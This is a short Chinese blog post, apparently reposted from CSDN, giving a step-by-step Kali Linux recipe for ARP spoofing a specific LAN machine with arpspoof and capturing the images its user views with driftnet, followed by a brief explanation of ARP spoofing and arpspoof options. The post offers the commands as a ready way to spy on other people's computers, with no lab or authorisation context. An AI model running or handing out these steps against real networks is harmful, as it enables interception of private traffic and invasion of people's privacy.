内网渗透--获取其他电脑相册

内网渗透之其他电脑相册获取

工具准备:
kali虚拟机

  1. 设定ip转发
    终端模式输入命令
echo 1 >/proc/sys/net/ipv4/ip_forward

注意:当机器网络重新启动,这个数字会回复default=0.如果需要永久修改可以更改/etc/sysctl.conf文件中的ip_forward=1.
2. 进行伪装

arpspoof -i eth0 -t 192.168.43.209 192.168.43.1

-t 后跟指定的攻击目标,后面的192.168.43.1是网关,如果攻击多个可以接着写-t 目标ip

  1. 新打开一个终端,输入命令,进行查看
driftnet -i eth0

到此,教程结束,只要目标电脑在浏览器浏览图片都会同步到你本机上.

下面附上ARP欺骗简介:
地址解析协议(ARP),全称 Address Resolution Protocol ,是一个位于TCP/IP协议栈中的网络层.当局域网内计算机间(或者是计算机与网关间)需要通信时,使用ARP协议获取目标IP地址对应的MAC地址,然后计算机再通过MAC地址完成数据包的发送,ARP欺骗一般目的是把自己伪装成网关从而欺骗目标机器,使本应发送到真实网关的数据包发送到欺骗者的机器.
攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目.

arpspoof用法
arpspoof [-i interface] [-c own|host|both] [-t targer] [-r] host

参数:
-i 指定攻击机的网络接口
-t 指定ARP攻击的目标,如果不指定,则目标为该局域网内所有的机器,可以同时指定多个目标

注:部分内容来源于网络.

猜你喜欢

转载自blog.csdn.net/key_book/article/details/80395444